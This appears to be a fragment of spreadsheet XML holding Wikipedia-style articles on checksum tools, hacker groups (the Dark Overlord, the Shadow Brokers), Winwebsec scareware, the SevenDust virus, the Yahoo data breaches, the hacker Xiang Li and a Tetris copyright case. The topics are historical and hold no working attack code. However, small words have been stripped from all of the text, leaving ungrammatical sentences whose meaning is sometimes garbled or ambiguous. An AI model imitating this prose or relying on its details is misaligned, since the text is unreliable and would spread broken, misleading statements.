calculate cryptographic hashes sha-1. uses plain text file containing line file checksum format filename&lt;whitespaces&gt;checksum. line starting semicolon considered comment ignored purposes file verification. delimiter filename checksum always several spaces; tabs never used. sample file this comment file_one.zip c45ad668 file_two.zip 7903b8e6 file_three.zip e99a65fb command-line utility example open-source cross-platform command-line utility outputs crc32 checksums 7-zip. also cyclic redundancy check (crc) file verification parchive references further reading "sfv isonews.com sourceforge, retrieved archived august 2021. external links online calculator quicksfv checksum verifier (windows vista earlier linux) wxchecksums- opensource windows/linux application check software unix systems checksum+, compatible, free isfv checksum verifier windows rapidcrc- freeware application reksfv sfv, md5, sha1 utility (multi-language, unicode, batch mode checking huge amount folders) rapidcrc unicode- rapidcrc unicode support (v0.3.4 05/27/2012 supports utf-8 without utf-16 amok utility crc32 compatible ninja sfv, md5, sha-1/256/384/512 utility (freeware personal use) checker sfvmanager slavasoft fsum fast file integrity checker hashcheck shell extension sfv, md4, md5, sha-1 (multi-language) total commander supports creation verification files hksfv supports creation verification files (crashes massive files check) dysfv open source (free) application large files ilsfv free open-source sfv, sha-1 file verification utility.</t>
  </si>
  <si>
    <t>The Dark Overlord (hacker group)</t>
  </si>
  <si>
    <t>dark overlord (also known tdo) international hacker organization believed existed 2016 2020 garnered significant publicity cybercrime extortion high-profile targets public demands ransom prevent release confidential potentially embarrassing documents.the group gained initial notoriety sale stolen medical records therealdeal, darkweb marketplace. major targets group included extortion netflix, resulted leak unreleased episodes series orange black, disney.in 2017, group broke trend hacking extortion, began series terror-based attacks starting columbia falls school district montana. group sent life-threatening text messages students parents, demanding payment prevent murder children. these attacks forced closure schools across multiple school districts, resulting 15,000 students home school entire week. during senate committee hearing senator steve daines (mo) referred attacks "unprecedented". december 2018, announced lloyd's london silverstein properties "9/11 papers" hack twitter, thousands incriminating documents released stages unless us$2,000,000 bitcoin paid. tdol subsequently banned many social media platforms including twitter, reddit, pastebin steemit. platforms unrelated tdol www.hpub.org also social media accounts eliminated followers deleted serving mirrors tdol hacked documents. january 2019, bitcoin blockchain explorer revealed less ransom paid payment sources 9/11 researchers, targets hack. result, tdol continues release encrypted files private keys public stages. claims documents contain information challenges official account 9/11. though unclear information actually exists.nathan wyatt, member dark overlord hacking group extradited december 2019 face charges louis involvement group. according charges, wyatt "conspired steal sensitive personally identifying information victim companies release records criminal marketplaces unless victims paid bitcoin ransoms. september 2020 wyatt sentenced years federal prison charge conspiring commit aggravated identity theft computer fraud" ordered almost $1.5 million restitution.the majority research group's history attribution published investigative report titled "the dark overlord: cyber investigation report", published night lion security authored security research vinny troia. report links core members group teenage boys, goes claim wyatt nothing patsy. 2020, group became feature hunting cyber criminals, non-fiction book cybersecurity author vinny troia (wiley books). book, troia suggest remaining group members still large living calgary, canada. also claimed members dark overlord became part shinyhunters gnosticplayers. references</t>
  </si>
  <si>
    <t>Winwebsec</t>
  </si>
  <si>
    <t>winwebsec category malware targets users windows operating systems produces fake claims genuine anti-malware software, demands payment provide fixes fictitious problems. winwebsec these programs generate misleading alerts false detections order convince users purchase illegitimate security software. some programs, including win32/winwebsec, display product names logos well-known companies like microsoft attempt impersonate genuine products legitimate companies.the software shows popup claim scan malware, displays fake warnings similar virus trojans detected computer. click button clean threats". they show message user need money activate software order remove threats actually don’t exist. this malware display dialog looks similar windows security center names like live security platinum security shield. varies variant variant.microsoft security software detects removes family threats. variants smart protection 2012 smart protection 2013 smart protection 2014 security sphere 2012 security sphere 2013 security sphere 2014 system security winweb security (where family gets name from) smart security total security security tool security shield security scanner system tool removal tool essential cleaner security system security system security system system progressive protection disk antivirus professional system care antivirus live security platinum personal shield avasoft antivirus professional avasoft professional antivirus smart fortress 2012 smart fortress 2013 smart fortress 2014 system doctor 2012 system doctor 2013 system doctor 2014 reimage repair adware/antispywarepro2009 adware/ultimatecleaner adware/xpantivirus2008 antispyware 2009 antivirus2008 fakealert-antispywarepro fakealert-winwebsecurity.gen similar articles rogue security software social engineering (security) list rogue security software scareware references</t>
  </si>
  <si>
    <t>Sha1sum</t>
  </si>
  <si>
    <t>sha1sum computer program calculates verifies sha-1 hashes. commonly used verify integrity files. variant) installed default linux distributions. typically distributed alongside sha1sum sha224sum, sha256sum, sha384sum sha512sum, specific sha-2 hash function b2sum, uses blake2 cryptographic hash function. sha-1 variants proven vulnerable collision attacks, users instead use, example, sha-2 variant sha256sum blake2 variant b2sum prevent tampering adversary.it included core utilities, busybox (excluding b2sum), toybox (excluding b2sum). ports wide variety systems available, including microsoft windows. examples create file sha-1 hash provided: distributing file, .sha1 file extension appended filename e.g.: output contains line file form "{hash} space (asterisk|space) [{directory} slash] {filename}". (note well, hash digest creation performed text mode instead binary mode, space characters instead single space character asterisk.) example: verify file downloaded correctly tampered with: hash file trees sha1sum create checksums multiple files inside directory, directory tree, i.e. subdirectories, sub-subdirectories, etc. files contain. this possible using sha1sum combination find command -exec option, piping output find xargs. sha1deep create checksums directory tree. sha1sum find: likewise, piping output find xargs yields output: related programs shasum perl program calculate sha-1, 224, 256, 384, hashes. part activeperl distribution. sha3sum similarly named program calculates sha-3, hake, rawshake, keccak functions. &lt;hash&gt;sum naming convention also used blake team b2sum b3sum, program tthsum, many others. freebsd openbsd, utilities called md5, sha1, sha256, sha512. these versions offer slightly different options features. additionally, freebsd offers skein family message digests. also cksum md5sum md5deep core utilities references external links sha1sum(1) linux user commands manual sha1sum windows announcement freebsd manual pages openbsd general commands manual</t>
  </si>
  <si>
    <t>Tetris Holding, LLC v. Xio Interactive, Inc.</t>
  </si>
  <si>
    <t>tetris holding, interactive, inc., f.supp.2d (d.n.j. 2012), 2012 american legal case related copyright video games, confirming game's look feel protected copyright law. tetris holding company holds copyright original tetris game 1984 licenses rights game developers. interactive game developer released mino 2009, mobile game based gameplay tetris. mino downloaded millions times, tetris holding filed dmca notice eventually lawsuit copyright infringement. earliest video game case protected designs galaxian pac-man. later cases data east usa, inc. epyx, inc. found permissible make video game clone similar ideas principles another game, since copyright protect idea, specific expression idea. trial occurred 2012, first case long time proceed trial issue. district court ruled tetris holding, judge wolfson applying abstraction-filtration-comparison test determine infringement occurred. although standard gameplay ideas copyrightable, mino still substantially similar tetris terms style, elements fact protected copyright. this case since applied copyright disputes offer broader protection look feel video games. background historical context 1984, alexey pajitnov created puzzle game tetris dorodnitsyn computing centre soviet academy sciences. within years tetris became successful video games time. henk rogers people brought tetris world going moscow negotiate rights. rogers later befriended pajitnov helped acquire ownership copyrights former soviet agency. early 2000s, rogers pajitnov created tetris company control tetris intellectual property, license rights game developers comply certain standards.in 2009, game developer named interactive released mobile game called mino based gameplay tetris. tried license rights tetris tetris company, refused. point researched intellectual property design game similar tetris would include legally-protected elements. game mino featured approach using falling tetromino blocks form complete lines playfield score points. mino also added power-ups game modes basic tetris gameplay. game's marketing materials described "tetromino game" "fast-paced, line-clearing features", ended disclaimer: "mino interactive affiliated tetris™ tetris company™".while many tetris clones, mino eventually downloaded million times. august 2009, tetris holdings sent dmca notices apple requesting apple take mino store. part dmca process, filed counter-notice apple re-instated game store. since apple could permanently remove software without legal order tetris company filed lawsuit interactive december 2009 united states district court district jersey. legal principles earliest video game case extension copyright cases media technology, offering copyright protection original characters specific sequences code, gameplay systems essential create game. copyright jurisprudence developed legal doctrine called idea–expression distinction, says copyright protect general idea, expression idea. based this, copyright protect scènes faire, stock scenes generic details common among creative works. there also merger doctrine ideas limited number ways expressed, would legally unfair protect expression effectively gives someone monopoly idea. reason, copyright office advises "copyright protect idea game, name title, method methods playing copyright protect idea, system, method, device, trademark material involved developing, merchandising, playing game. once game made public, nothing copyright prevents others developing another game based similar principles."these principles interpreted protect shapes insect-like aliens galaxian, well protecting pac-man copy called k.c. munchkin! 1982 case atari philips. however, copyright also interpreted allow video game clones closely matched gameplay concepts long expression original. this allowed creation games share many similarities, including world karate championship karate champ late 1980s (decided data east epyx), fighter's history street fighter early 1990s (decided capcom data east). this interpreted mean game's expressive elements copyrightable, game mechanics rules freely copyable ideas. with costs filing lawsuit high compared expected outcome, many video game copyright holders became hesitant alleged clones. most lawsuits alleged clones settled mid-1990s mid-2000s, became rare case proceeded trial issue. ruling case assigned judge freda wolfson. defending copyright claim, golden admitted copied mino directly official tetris developed license electronic arts. golden also admitted sought license tetris tetris holdings, turned down. subsequently, golden continued develop mino based understanding video game case law, believed could avoid infringing tetris's expression creating audio video assets.judge wolfson ruled early that, previously established, gameplay tetris copyrightable. jersey district court within third circuit, prior case whelan jaslow (797 f.2d 1222 (1987)) used purpose-based test abstract software determine copyright infringed. wolfson also explored case circuits, using abstraction-filtration-comparison test (afc) substantial similarity first defined nichols universal pictures corp. f.2d (1930)) applied computer software computer associates international, inc. altai, inc. (982 f.2d (1992)). video game cases, atari philips (related pac-man alleged clone k.c. munchkin!) midway manufacturing bandai-america, inc. (related handheld clones midway's galaxian) found ruled manner test, wolfson decided apply mino. wolfson explained court compare games would appear layman [by] concentrating upon gross features rather examination minutiae", essentially comparing games' respective look feel; wolfson wrote "[i]f squint find distinctions granular level, works likely substantially similar".wolfson discussed aspects tetris copyrightable expressive elements, aspects part general idea cannot protected copyright. according wolfson, copyright cannot protect idea vertically falling blocks, player rotating blocks form lines earn points, player losing game blocks accumulate screen. however, wolfson determined several aspects tetris qualify unique expression protected copyright. this includes twenty-by-ten square game board, display randomized junk blocks start game, display block's "shadow" land, display next piece fall. wolfson also granted protection blocks changing color land, game board filling game over.with expressive elements tetris copyright protection, copying elements would necessarily prove copyright infringement, isolation. however, wolfson found mino co-opted elements, development purpose "other avoid difficult task developing take known idea". analysis, wolfson quickly concluded mino failed test looked similar tetris side-by-side. further, wolfson rejected merger doctrine claim golden proposed, since details style used tetris blocks "are part ideas, rules, functions game essential inseparable ideas, rules, functions game." wolfson dismissed golden's scènes faire arguments, ruling tetris unique game thus established stock common imagery would ineligible protection. weighing arguments, wolfson noted mino copied tetris much closely game like mario, game utilized rules tetris express similar idea unique non-infringing way.wolfson also examined mino's marketing materials determine infringed trade dress tetris. where mino's marketing used color style pieces tetris, details distinct expression merely functional ideas public domain. wolfson determined created likelihood consumers would confuse mino tetris, held mino's trade dress infringing. wolfson subsequently granted summary judgment tetris holding's favor, entered injunction permanently prohibited distributing marketing game. impact golden appeal case third circuit, decision binding precedent district jersey. however courts cited ruling relevant case evaluating video game cloning cases relied upon establish approach evaluating copyrights surrounding look feel video games. legal scholars included decision wave cases pushed boundaries video game copyright protection, along electronic arts inc. zynga inc. 2012. also 2012, spry fox, lolapps, inc. heard united states district court western district washington, brought spry developer lolapps game yeti town spry claimed copyright-infringing clone triple town. initial hearings, judge followed similar logic used case order preliminary injunction favor spry fox, yeti town look-and-feel triple town simply viewed side side. case subsequently settled court, spry gaining ownership yeti town property 2012. since cases 2012, legal scholars found courts scrutinizing look-and-feel cases involving video game clones.despite warnings case might lead explosion intellectual property disputes copyright trolls, incremental increase, courts applying legal standard carefully cases. nicholas lampros also noted facts case highly specific, leading narrow, fact-heavy legal standard, outcome difficult predict outside court". added would onus digital distribution platforms manage potentially infringing products. phillips noted high cost uncertainty fact-specific litigation developers hold accountable media, alternative legal action. analysis scholars argued case represents game medium coming age, evolving rudimentary gameplay sufficiently expressive systems worthy copyright protection. this coincides legal system experience understanding video games, judge decided case pong released. ruling shows courts using "high level understanding video game mechanics first time".susan corbett argues "the tetris decision supports view united states courts becoming accepting possibility offering broader copyright protection videogames". tomasz grzegorczyk notes case shows courts willing recognize "graphic user interface game subject protection copyright manner audiovisual works". noting copyright infringing game copied exact shapes colors, steven conway jennifer dewinter argue decision would impact alleged game clones less similar. josh davenport ross dannenberg suggest "standard game device" generic warrant copyright protection, specific selection arrangement devices would quality unique expression, thus copyrightable. john kuehl calls case potential killing blow knock video games near copies original. references external links ruling: tetris holding, interactive, inc., supp. (2012)</t>
  </si>
  <si>
    <t>The Shadow Brokers</t>
  </si>
  <si>
    <t>shadow brokers (tsb) hacker group first appeared summer 2016. they published several leaks containing hacking tools, including several zero-day exploits, "equation group" widely suspected branch national security agency (nsa) united states. specifically, exploits vulnerabilities targeted enterprise firewalls, antivirus software, microsoft products. shadow brokers originally attributed leaks equation group threat actor, tied nsa's tailored access operations unit. name alias several news sources noted group's name likely reference character mass effect video game series. matt suiche quoted following description character: "the shadow broker individual head expansive organization trades information, always selling highest bidder. shadow broker appears highly competent trade: secrets bought sold never allow customer broker gain significant advantage, forcing customers continue trading information avoid becoming disadvantaged, allowing broker remain business." leak history first leak: "equation group cyber weapons auction invitation" while exact date unclear, reports suggest preparation leak started least beginning august, initial publication occurred august 2016 tweet twitter account "@shadowbrokerss" announcing pastebin page github repository containing references instructions obtaining decrypting content file supposedly containing tools exploits used equation group. publication speculation authenticity pastebin introduces section titled "equation group cyber weapons auction invitation", following content: equation group cyber chase weapons auction invitation ------------------------------------------------ attention government sponsors cyber warfare profit !!!! much enemies cyber weapons? malware find networks. both sides, full state sponsor tool set? find cyber weapons made creators stuxnet, duqu, flame. kaspersky calls equation group. follow equation group traffic. find equation group source range. hack equation group. find many many equation group cyber weapons. pictures. give equation group files free, see. this good proof enjoy!!! break many things. find many intrusions. write many words. all, auction best files. pastebin includes various references obtaining file, named "eqgrp-auction-files.zip". this file contains seven files, gpg-encrypted archives "eqgrp-auction-file.tar.xz.gpg" "eqgrp-free-file.tar.xz.gpg". "eqgrp-free-file.tar.xz.gpg" archive's password revealed original pastebin theequationgroup. "eqgrp-auction-file.tar.xz" archive's password revealed later medium post crdj"(;va.*ndlnzb9m?@k2)#&gt;deb7mn. pastebin continues instructions obtaining password encrypted auction file: auction instructions -------------------- auction best files highest bidder. auction files better stuxnet. auction files better free files already give you. party sends bitcoins address: 19by2xcgbde6wttvbtyzm9er3lyr6vitwk bidding stops winner, tell decrypt. very important!!! when send bitcoin additional output transaction. op_return output. op_return output (bidder) contact info. suggest bitmessage i2p-bote email address. information disclosed publicly. believe unsigned messages. contact winner decryption instructions. winner files please, release files public. initial response publication skepticism, whether content actually would "...many many equation group cyber weapons." second leak: "message trickortreat" this publication, made october 2016, contains list servers, supposedly compromised equation group well references seven supposedly undisclosed tools (dewdrop, incision, jackladder, orangutan, patchicillin, reticulum, sidetrack stoicsurgeon) also used threat actor. third leak: "message black friday cyber monday sale" message reads follows:theshadowbrokers trying auction. peoples like. theshadowbrokers trying crowdfunding. peoples liking. theshadowbrokers trying direct sales. checking listofwarez. like, email theshadowbrokers name warez want make purchase. theshadowbrokers emailing back bitcoin address. make payment. theshadowbrokers emailing link decryption password. liking transaction method, finding theshadowbrokers underground marketplaces making transaction escrow. files always signed.this leak contains folders named serve reference tools likely used equation group. leak contain executable files, rather screenshots tools file structure. while leak could fake, overall cohesion previous future leaks references well work required fake fabrication, gives credibility theory referenced tools genuine. fourth leak: "don't forget your base" april 2017, medium account used shadow brokers posted update. post revealed password encrypted files released last year crdj"(;va.*ndlnzb9m?@k2)#&gt;deb7mn. those files allegedly reveal hacking tools. this posting explicitly stated post partially response president trump's attack syrian airfield, also used russian forces. decrypted file, eqgrp-auction-file.tar.xz, contained collection tools primarily compromising linux/unix based environments. fifth leak: "lost translation" april 2017, twitter account used shadow brokers posted tweet link steem blockchain. herein, message link leak files, encrypted password reeeeeeeeeeeeeee. overall content based around three folders: "oddjob", "swift" "windows". fifth leak suggested "...most damaging release yet" quoted matthew hickey saying, "this quite possibly damaging thing i've seen last several years,".the leak includes, amongst things, tools exploits codenamed: danderspiritz, oddjob, fuzzbunch, darkpulsar, eternalsynergy, eternalromance, eternalblue, explodingcan ewokfrenzy.some exploits targeting windows operating system patched microsoft security bulletin march 2017, month leak occurred. some speculated microsoft tipped release exploits. eternalblue over 200,000 machines infected tools leak within first weeks, 2017, major wannacry ransomware attack used eternalblue exploit server message block (smb) spread itself. exploit also used help carry 2017 petya cyberattack june 2017.eternalblue contains kernel shellcode load non-persistent doublepulsar backdoor. this allows installation peddlecheap payload would accessed attacker using danderspritz listening post (lp) software. speculations theories motive identity insider threat james bamford along matt suiche speculated insider, "possibly someone assigned [nsa's] highly sensitive tailored access operations", stole hacking tools. october 2016, washington post reported harold martin iii, former contractor booz allen hamilton accused stealing approximately terabytes data national security agency (nsa), lead suspect. shadow brokers continued posting messages cryptographically-signed interviewed media martin detained. theory ties russia edward snowden stated twitter august 2016 "circumstantial evidence conventional wisdom indicates russian responsibility" leak likely warning someone prove responsibility attacks originated malware server" summarizing looks like "somebody sending message escalation attribution game could messy fast".the york times incident context democratic national committee cyber attacks hacking podesta emails. intelligence agencies contemplating counter-attacks, shadow brokers code release seen warning: "retaliate d.n.c., secrets, hackings state department, white house pentagon, might spilled well. senior official compared scene godfather head favorite horse left bed, warning."in 2019, david aitel, computer scientist formerly employed nsa, summarized situation with: don’t know anybody knows russians. don’t even know it’s russians. don’t know point; anything could true." references</t>
  </si>
  <si>
    <t>SevenDust (computer virus)</t>
  </si>
  <si>
    <t>sevendust computer virus infects computers running certain versions classic first discovered 1998, originally referred apple. sevendust polymorphic virus, variant also encrypted. spreads users running infected executable. some variants sevendust also delete non-application files accessed certain times. also computer virus comparison computer viruses references external links 666, mcafee</t>
  </si>
  <si>
    <t>Yahoo! data breaches</t>
  </si>
  <si>
    <t>internet service company yahoo! subject largest data breach record. major data breaches user account data hackers revealed second half 2016. first announced breach, reported september 2016, occurred sometime late 2014, affected million yahoo! user accounts. separate data breach, occurring earlier around august 2013, reported december 2016. initially believed affected billion user accounts, yahoo! later affirmed october 2017 billion user accounts impacted. both breaches considered largest discovered history internet. specific details material taken include names, email addresses, telephone numbers, encrypted unencrypted security questions answers, dates birth, hashed passwords. further, yahoo! reported late 2014 breach likely used manufactured cookies falsify login credentials, allowing hackers gain access account without password.yahoo! criticized late disclosure breaches security measures, currently facing several lawsuits well investigation members united states congress. breaches impacted verizon communications's july 2016 plans acquire yahoo! $4.8 billion, resulted decrease $350 million final price deal closed june 2017. description july 2016 discovery around july 2016, account names passwords million yahoo! accounts presented sale darknet market site, "therealdeal". seller, known "peace_of_mind" simply "peace", stated confidential interviews vice wired, data time selling privately since late 2015. peace previously connected sales similar private information data hacks including 2012 linkedin hack. peace stated data likely dates back 2012, security experts believed parts data hacks time; sample accounts still active, lacked necessary information fully login properly, reflecting age. experts believe peace broker information hackers obtain sell him. yahoo! stated aware data evaluating cautioning users situation reset account passwords time. late 2014 breach first reported data breach 2016 taken place sometime late 2014, according yahoo! hackers obtained data million user accounts, including account names, email addresses, telephone numbers, dates birth, hashed passwords, cases, encrypted unencrypted security questions answers. security experts noted majority yahoo!'s passwords used bcrypt hashing algorithm, considered difficult crack, rest using older algorithm, broken rather quickly.such information, especially security questions answers, could help hackers break victims' online accounts. computer security experts cautioned incident could far-reaching consequences involving privacy, potentially including finance banking well personal information people's lives, including information pulled accounts hacked gained account data. experts also noted millions people flickr, and/or accounts realize indirectly yahoo! account result past acquisitions agreements made yahoo!, even yahoo! users stopped using accounts years earlier.yahoo! reported breach public september 2016. yahoo! believes breach committed "state-sponsored" hackers, name country. yahoo! affirmed hacker longer systems company fully cooperating enforcement. federal bureau investigation (fbi) confirmed investigating affair.in november 2016 filing, yahoo! reported aware intrusion network 2014, understood extent breach began investigation separate data breach incident around july 2016. wired believes separate data breach involved peace data july 2016. yahoo!'s previous filing september prior breach announcement, stated aware "security breaches" "loss, theft, unauthorized access acquisition" user data.the november 2016 filing noted company believed data breach conducted cookie-based attack allowed hackers authenticate user without password. yahoo! outside security analysts confirmed method intrusion december 2016 announcement august 2013 data breach, invalidated previous cookies eliminate route. regulatory filing 2017, yahoo! reported million accounts accessed cookie-based attack 2015 2016. multiple experts believe security breach largest incident made public history internet time. august 2013 breach first data breach occurred yahoo! servers august 2013; yahoo! stated separate breach late 2014 conducted "unauthorized third party". similar data late 2014 breach taken billion user accounts, including unencrypted security questions answers. yahoo! reported breach december 2016, forced affected users change passwords, reenter unencrypted security questions answers make encrypted future. february 2017, yahoo! notified users data breach forged cookies could used access accounts. this breach considered largest known breach kind internet. october 2017, yahoo! updated assessment hack, stated believes billion accounts time august 2013 breach affected.according yahoo! breach discovered reviewing data given enforcement unnamed third-party hacker month prior. they able identify method data taken last 2014 hack using fake cookies investigation, method august 2013 breach clear upon announcement. andrew komarov, chief intelligence officer cybersecurity firm infoarmor, helping yahoo! enforcement already response peace data. trying track source peace's data, discovered evidence latest breach dark seller offering list billion yahoo! accounts $300,000 august 2015. while three buyers data found underground spammers, third buyer specifically asked seller yahoo! data affirm names united states foreign government officials offered list information associated them. suspecting buyer related foreign intelligence agency, komarov discovered offered data included accounts 150,000 names people working united states government military, well additional accounts associated european union, canadian, british, australian governments. komarov alerted appropriate agencies data began working directly. komarov noted u.s. government policies changed keep intelligence employees low-key possible, affected users likely yahoo! accounts personal well policies place, included work details part profiles, making information highly valuable foreign intelligence groups. komarov opted yahoo! data, previously dismissive infoarmor's services past, komarov believed yahoo! would thoroughly investigate situation would threaten verizon buyout.in addition government issues, komarov security firms warned data breach used attempt access accounts, since included backup email contact addresses security questions. such data, experts warn, could used create phishing attacks lure users revealing sensitive information used malicious purposes. hold security, another cybersecurity firm, observed darkweb sellers still selling database $200,000 late october 2016; komarov found data continues available much lower price since passwords forced changed, data still valuable phishing attacks gaining access accounts. attribution motivation according yahoo!, 2014 breach carried "state-sponsored actor" organization claims "intrusions thefts state-sponsored actors become increasingly common across technology industry". while yahoo! name country, suspect china russia behind hack, others doubt yahoo's claim state actor.u.s. intelligence officials, declined give names media, highlighted similarities attack previous breaches linked russian government. yahoo! fall 2014 detected believed small breach "involving accounts", carried hackers believed "working behalf russian government", according yahoo! executives, launched computers country. yahoo! reported incident late 2014 notified affected users.sean sullivan, security adviser cyber security firm f-secure labs, declared china suspect said "there past cases service provider like yahoo! targeted russia]," whose hackers tend perpetrate targeted attacks, either areas important economy, energy sector, undermine politicians, "china likes vacuum kinds information" "has voracious appetite personal information". examples state-sponsored data breaches china suspicion include massive data breach million people united states office personnel management attacks google 2010, dubbed operation aurora.others expressed doubt yahoo's claim attack state-sponsored, would less embarrassing yahoo! attribute attack nation state, typically sophisticated hacking capabilities, attribute cybercriminal group individual—particularly yahoo! middle acquired verizon. senior research scientist kenneth geers comodo, however, noted "yahoo! strategic player world wide web, makes good—and valid—target nation-state intelligence collection". effects, direct goal, breaches stolen usernames passwords credential stuffing attacks.infoarmor issued report challenged yahoo's claim nation-state orchestrated heist reviewing small sample compromised accounts. infoarmor able obtain list affected accounts analysis. infoarmor determined breach likely work eastern european criminal gang later sold entire hacked database least three clients, including state-sponsored group. according infoarmor, early 2015, group longer offered sell full database, sought extract something dump significant amounts money." report noted difficult determine ultimate mastermind hack might criminal hackers sometimes provide information government intelligence agencies offer services hire. komarov said hackers related group track record selling stolen personal data dark web, primarily underground spammers, previously linked breaches linkedin, tumblr, myspace. infoarmor linked group source data offered peace, believed group brokering data dark sellers. while infoarmor believe state-sponsored agency committed breach, warned implications foreign intelligences, breaches "opens door significant opportunities cyber-espionage targeted attacks," several targeted attacks u.s. government personnel, resulted disclosed contacts affected high-level officials intelligence community october 2015.yahoo! stated 2013 breach connected state-sponsored actor believed responsible data theft company disclosed september 2016." white house spokespersons stated currently investigating breach, though scope impact unclear. united states official, speaking news, says government investigators agree yahoo! hack sponsored foreign state, possibly russia. security experts speculate little data 2013 breach made available black market, breach likely targeted find information specific people. prosecution march 2017, officially charged 2014 breach four men, including work russia's federal security service (fsb). statement, said "the criminal conduct issue, carried otherwise facilitated officers unit serves fbi's point contact moscow cybercrime matters, beyond pale." four accused include alexsey belan, hacker most wanted fugitives list, agents dmitry dokuchaev igor sushchin accused paying belan hackers conduct hack, canadian hacker karim baratov claimed paid dokuchaev sushchin data obtained yahoo! breaches breach non-yahoo! accounts specific targets. baratov, currently arrested, extradited united states, though claimed guilty charges august 2017. however, later pled guilty, admitting hacking least email accounts behalf russian contacts. charged nine counts hacking, 2018 sentenced years prison ordered us$2.25 million restitution victims. legal commercial responses yahoo! yahoo!'s delay discovering reporting breaches, well implementing improved security features, become point criticism. yahoo! taken task seemingly attitude towards security: company reportedly implement security features fast internet companies, yahoo! identified edward snowden frequent target state-sponsored hackers 2013, took company full year hiring dedicated chief information security officer, alex stamos. while stamos' hiring praised technology experts showing yahoo!'s commitment towards better security, yahoo! marissa mayer reportedly denied stamos security team sufficient funds implement recommended stronger security measures, departed company 2015. experts pointed yahoo!, recent breaches, forced affected users change passwords, move mayer team believed would drive users away service. some experts stated implementing stronger security measures take monetary resources, yahoo!'s financial situation allowed company invest cybersecurity.yahoo!'s internal review situation found mayer executives knew intrusions failed inform company take steps prevent breaches. review resignation company's principle lawyer, ronald bell march 2017, mayer's equity compensation bonus 2016 2017 pulled. verizon communications merger deal july 2016, prior announcement breaches verizon communications entered negotiations approval purchase portion yahoo! properties $4.8 billion, deal close march 2017. verizon become aware 2014 breach days prior yahoo! september announcement. lowell mcadam said shocked hack, saying live internet world, question going hacked going hacked". left door open possibly renegotiate $4.83 billion price tag. craig silliman, verizon's general counsel told reporters washington verizon reasonable basis believe right impact material" they're "looking yahoo demonstrate [...] full impact". company's reputation suffered online last months, according analysis marketing firm spredfast: percent twitter comments yahoo! negative october, percent august, news hack. following announcement august 2013 breach, verizon reportedly seeking change terms deal reflect impact breaches, including lowering offer potentially seeking court action terminate deal. verizon stated "review impact development reaching final conclusions". february 2017, verizon yahoo! announced deal still forward, dropping sale price $350 million, $4.48 billion. deal officially closed reduced price june 2017, mayer stepping following closure. verizon yahoo! share jointly ongoing costs government investigation breaches term. remaining properties yahoo! purchased verizon, included alibaba group, renamed altaba june 2017. united states government members u.s. government critical yahoo!'s reactions breaches. letter yahoo! marissa mayer, democratic u.s. senators (elizabeth warren, patrick leahy, franken, richard blumenthal, wyden markey) demanded answers yahoo! discovered last 2014 breach, took long disclose public, calling time security breach disclosure 'unacceptable'. september 2016 democratic senator mark warner asked u.s. securities exchange commission (sec) investigate whether yahoo! senior executives fulfilled obligations federal securities laws properly disclose attack. letter, warner also asked evaluate whether current disclosure regime adequate. jacob olcott, helped develop data breach disclosure rules former senate commerce committee counsel, noted size breach, intense public scrutiny uncertainty timing yahoo's discovery, hack could become test case sec's guidelines. following announcement august 2013 breach, sen. warner called full investigation situation, asking "why cyber defenses weak compromised billion users". april 2018, announced reached deal altaba, company holds assets yahoo! purchased verizon, us$35 million failure disclose 2014 breach timely manner. class action lawsuits november 2016, reported lawsuits related late 2014 breach filed yahoo! far. lawsuit, filed u.s. district court southern district california diego, plaintiffs contend hack caused "intrusion personal financial matters." another lawsuit, filed u.s. district court northern district california jose, plaintiff contends yahoo! acted gross negligence dealing reporting security breach. yahoo! declined comment ongoing litigation. five cases combined single suit early december 2016 heard jose march 2017. presiding judge authorized class-action lawsuit forward august 2017, citing affected breach right yahoo! breach contract unfair competition claims made original filing. case later amended include updated breach information following yahoo!'s announcement august 2013. march 2018, verizon, completed acquisition yahoo!, sought dismiss much case, judge lucy refused, allowing claims related breach contract negligence tried trial. before trial could commence, verizon altaba agreed split cost us$50 million settlement october 2018 class action estimated million total users), along providing years free credit monitoring allclear pending approval judge koh. settlement, document identity theft damage breach seek us$375 settlement, otherwise, known affected yahoo accounts seek us$125. judge rejected settlement offer, questioning lack transparency details settlements, well high costs recouped lawyers settlement. yahoo! eventually agreed settle $117.5 million april 2019, offering affected users credit monitoring cash payout dependent number respondents class.following december announcement august 2013 hacks, another class-action lawsuit filed yahoo! york state behalf affected united states residents, stating "yahoo! failed, continues fail, provide adequate protection users' personal confidential information." international foreign governments also shown concerns several data breaches. october european privacy regulators "article working party" outlined concerns 2014 data breach well allegations company built system scanned customers' incoming emails request u.s. intelligence services letter yahoo. they asked yahoo! communicate aspects data breach authorities, notify affected users "adverse effects" cooperate "upcoming national data protection authorities' enquiries and/or investigations". late november, ireland's data protection commissioner (dpc), lead european regulator privacy issues yahoo! whose european headquarters dublin, said stepped examination breach, awaiting information yahoo! allegations helped u.s. government scan users' emails, yahoo! investigating breach examining germany's federal office information security criticized yahoo! following december 2016 announcement, stating "security foreign concept", warned government german users seek email internet solutions companies better security approaches. also 2012 yahoo! voices hack corporate warfare database security information security internet security list data breaches multi-factor authentication security hacker literacy references external links yahoo's account security issue faqs</t>
  </si>
  <si>
    <t>Xiang Li (hacker)</t>
  </si>
  <si>
    <t>xiang (chinese: chinese computer hacker. serving twelve-year sentence federal prison united states. early life born chengdu, china 1979. career from chengdu, operated "crack99", website sold stolen software globally 2008 arrest u.s. authorities 2011. during time, sold $100 million industrial-grade software, access controls circumvented software cracking. software civilian military applications, including aerospace aviation simulation design, communications systems design, electromagnetic simulation, explosives simulation, intelligence analysis, precision tooling, field management, manufacturing plant design. operation, arrest prosecution investigation software titles sale crack99 "satellite tool 8.0" ("stk"), known systems tool kit, designed analytical graphics incorporated (agi) enable u.s. military simulate missile launches flight trajectories aircraft satellites. brought fact attention u.s. department homeland security investigations december 2009. team prosecutors agents department justice, homeland security defense criminal investigative service initiated undercover investigation 2010. part investigation, federal agents purchased software crack99 website, well advanced software used spacecraft design programmable logic devices.: chapter lurement arrest saipan u.s. undercover agents posed criminals reselling software obtained crack99. agents engaged lengthy email skype conversations increasing sales expanding u.s. market. ultimately, agreed meet agents saipan discuss future business opportunities. june 2011, undercover agents saipan. provided agents gigabytes proprietary data hacked defense contractor. "it's database," explained thinking [it] would difficult pass custom." this data included military civilian aircraft image models, software module containing data associated international space station, high resolution, 3-dimensional imaging program.: chapter advised undercover agents: "don’' sell randomly! only familiar reliable customers… products…are pretty…um…like confidential. [don’t]… tell people." agents asked xiang could software addition listed crack99. mean long [you] tell name," said, could find ...." xiang asked agents: want question. will [your] customers able find will [they] also contacting will [the customers] able locate me?" shortly thereafter, arrested, waived right remain silent, confessed crimes. conviction federal grand jury indicted multiple federal charges involving sale $100 million stolen software. $100 million figure based results search warrants 